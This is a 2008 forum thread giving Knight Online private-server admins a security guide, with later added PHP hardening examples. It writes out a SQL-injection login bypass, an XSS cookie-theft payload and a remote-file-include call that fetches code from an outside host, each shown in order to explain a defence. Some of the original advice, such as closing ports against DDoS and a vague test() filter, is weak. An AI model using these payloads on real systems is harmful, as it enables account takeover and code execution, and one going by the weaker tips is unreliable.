[Guide] Got hacked? Afraid of getting hacked?
 
 
Join Date: Jun 2007
Posts: 388
09-05-2008, 12:54 PM
 
Hi all,
I decided to write my first guide because recently I got too many PMs about the security of KO servers.
I will tell you how to make your server as secure as it should be.

  • KOPANEL
  • PORTS
  • FORUM

KOPANEL:

Well, the kopanels that you downloaded from RaGEZONE or got from someone else are just not SECURE, because their source is known by other people, so if they find a vulnerability they can hack you anytime...
I suggest you write your own kopanel, BUT:
make sure you don't allow any kind of XSS, SQL injection, file upload or RFI security hole in it.
If you don't know anything about PHP, then kopanel is OK for you, but it still has some security problems.
Before you add something to your kopanel, look at the code; it may contain dangerous code.
How to secure your panel from SQL injection?
Test() all $_POST and $_GET data in the source.
What about XSS attacks?
Disable the JavaScript on some parts of your kopanel.

Example of SQL injection:
in login.php

$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = '$login' AND strPasswd = '$pass'";

so if I write gerydeft' or '1'='1 in the login field and pass' or '1'='1 in the password field, our query will look like this:

$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = 'gerydeft' or '1'='1' AND strPasswd = 'pass' or '1'='1'";

because 1 always equals 1, it will log me in on gerydeft's account.

(This is just a typical SQL injection; there are a lot of ways to execute this hack.)

You could say I can't insert such a long string because of
<td>User:</td>
<td><input type="text" class="input" name="user" value="" maxlength="12" size="12"></td>

That's false. This is client-side code, so I can edit it as I want.
So what is the way to fix it?

If you have heteric's anti_sqlinjection.php,
then include it and test() all GET and POST data.

What does an XSS attack (cross-site scripting) look like?

Plenty of input fields on the web are vulnerable to this hack.
For example, I would write <script>alert(document.cookie)</script>

This script is in the source, and if RaGEZONE hadn't secured it, I could now steal your accounts.
How? I would send your cookies to my server and inject them.
An XSS attack can only execute client-side script, not server-side.

What about server-side PHP scripts?
There is a hack called RFI (Remote File Include).
Take a PHP file, say:
vuln.php:
PHP Code:
<?php
include($_GET["act"]);
?>
so I execute: vuln.php?act=http://mysite.com/phpcode.txt

and all the PHP code in my txt would run.

One more suggestion: always use the most recent PHP version, and don't leave server.ini in your www folder
(or anybody can read it).

PORTS:
Well, if you have a router, basically most ports are closed, but if you don't, I suggest you install a firewall
and close some of these ports:
21 ftp (only if your server doesn't use this)
23 telnet
1433 mssql
3306 mysql

Be careful: don't close the game ports or 80, or your website will be down.

Also don't leave Remote Desktop open on your server; rather use VNC or TeamViewer, and if you can, only allow connections from yourself.

Change your MSSQL password once a week, and never test something on your own server; rather test it on your PC.

If you got DDoSed, closing ports is also a way to fix it.

Make backups often, once or twice a week.

FORUM:
Forums are also a vulnerable part of your server.
I suggest you use an external forum, and do not store passwords or anything important in your PM box.

Disable the xp_cmdshell command in your MSSQL database.
Also disable net.exe and net2.exe in the system32 folder.

Good luck with your server; sorry for my grammar, I am not an English man ^^

Last edited by DaRkAnGeL; 09-07-2008 at 11:43 AM.
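The login.php injection described in the post above, worked through as an added example (this is not code from the original post). It rebuilds the post's tb_user table in an in-memory SQLite database so it runs without a KO server; the use of PDO with SQLite, the sample account row, and enforcing the form's 12-character maxlength on the server are assumptions of this example, not something the post prescribes.

```php
<?php
// Added example, not code from the original post. The tb_user table from the
// post is recreated in an in-memory SQLite database (assumption: the pdo_sqlite
// extension is available) so the block runs stand-alone.

declare(strict_types=1);

// Vulnerable form from the post: user input is interpolated into the SQL text,
// so a quote in the input changes the structure of the WHERE clause.
function vulnerableQuery(string $login, string $pass): string
{
    return "SELECT COUNT(strAccountID) FROM tb_user WHERE strAccountID = '$login' AND strPasswd = '$pass'";
}

// Hardened form: the SQL text is fixed and the values are bound as parameters,
// and the 12-character limit that the HTML form only enforces client-side
// (the post points out that maxlength can be edited) is re-checked here.
function loginOk(PDO $db, string $login, string $pass): bool
{
    if (strlen($login) > 12 || strlen($pass) > 12) {
        return false;
    }
    $stmt = $db->prepare(
        'SELECT COUNT(strAccountID) FROM tb_user WHERE strAccountID = :login AND strPasswd = :pass'
    );
    $stmt->execute([':login' => $login, ':pass' => $pass]);
    return (int) $stmt->fetchColumn() === 1;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tb_user (strAccountID TEXT, strPasswd TEXT)');
$db->exec("INSERT INTO tb_user VALUES ('gerydeft', 'secret')"); // constructed sample row

// 1. The payload from the post against the interpolated query: the trailing
//    or '1'='1' makes the WHERE clause true for every row, so COUNT is 1 and
//    the login succeeds without knowing the password.
$sql = vulnerableQuery("gerydeft' or '1'='1", "pass' or '1'='1");
echo $sql, PHP_EOL;
echo 'vulnerable query count = ', (int) $db->query($sql)->fetchColumn(), PHP_EOL;

// 2. The prepared statement: a 12-character variant of the same payload is
//    compared literally as an account name, matches nothing, and the real
//    credentials still work.
var_dump(loginOk($db, "x' or '1'='1", 'pass'));  // bool(false)
var_dump(loginOk($db, 'gerydeft', 'secret'));     // bool(true)
```

Two caveats for a real panel: the MSSQL driver takes the same prepare/execute shape (the sqlsrv PDO DSN replaces the SQLite one), and this example keeps the post's plaintext strPasswd comparison only because that is the schema the post shows; a panel you write yourself should store a password hash and compare against that.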
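The vuln.php include from the post and the XSS payload it quotes, beside hardened versions, as an added example (not code from the original post). The allowlisted page names and file paths in $pages are invented for illustration; the point is that the request only selects a key and never supplies a path.

```php
<?php
// Added example, not code from the original post. Page names and paths below
// are illustrative assumptions.

declare(strict_types=1);

// Vulnerable pattern from the post: the file name comes straight from the URL.
// ?act=http://mysite.com/phpcode.txt fetches and executes remote code when
// allow_url_include is On, and ?act=../../server.ini reads local files.
function vulnerableInclude(string $act): void
{
    include($act);
}

// Hardened dispatcher: the request chooses a key, the path is fixed in code.
function resolvePage(string $act): ?string
{
    $pages = [
        'home'    => __DIR__ . '/pages/home.php',
        'account' => __DIR__ . '/pages/account.php',
        'ranking' => __DIR__ . '/pages/ranking.php',
    ];
    return $pages[$act] ?? null; // URLs, ../ paths and unknown keys all map to null
}

// XSS: the post's payload is neutralised by encoding at output time, so the
// browser renders it as text instead of running it.
function escapeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

foreach (['home', 'http://mysite.com/phpcode.txt', '../../server.ini', 'ranking'] as $act) {
    printf("%-32s -> %s\n", $act, resolvePage($act) ?? 'REJECTED');
}

echo escapeHtml('<script>alert(document.cookie)</script>'), PHP_EOL;
// &lt;script&gt;alert(document.cookie)&lt;/script&gt;
```

The post's cookie-theft scenario is additionally blunted by setting the session cookie HttpOnly (session_set_cookie_params with httponly set to true), so document.cookie does not expose it even where an encoding step is missed; and allow_url_include should be Off in php.ini regardless, as defence in depth behind the allowlist.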
 
 
.:: Computer Science ::.

Rank: Moderator


 
Join Date: Oct 2006
Location: Greece/Ioannina University
Posts: 3,853
09-07-2008, 12:24 PM
 
Nice,
added [link]
 
 
 
KnightOnline Coder

Rank: Subscriber


 
Join Date: Dec 2006
Posts: 266
11-21-2008, 06:38 PM
 
Nice, what about DDoS protection?
 
 

 
Newbie

Rank: Omicron


 
Join Date: Nov 2008
Posts: 23
12-18-2008, 08:06 PM
 
Any way to protect the Ebenezer from port attacks?
 
 
 
Member

Rank: Omicron


 
Join Date: Apr 2008
Posts: 28
12-19-2008, 09:35 AM
 
Change the Ebenezer port, simple as that?
 
 